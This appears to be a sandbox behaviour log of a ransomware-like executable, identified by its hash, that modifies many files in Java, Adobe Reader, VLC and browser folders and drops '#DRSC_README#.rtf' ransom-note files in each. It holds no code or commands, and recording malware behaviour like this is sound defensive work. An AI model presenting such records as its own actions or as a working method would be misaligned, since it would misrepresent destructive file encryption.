710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jabswitch.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_hover_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\en_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-hover_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\policytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\orb.idl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ml.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javacpl.cpl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\charsets.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\keytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\unpack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\InvokeStart.jpeg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reject_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\unpack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\java.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png 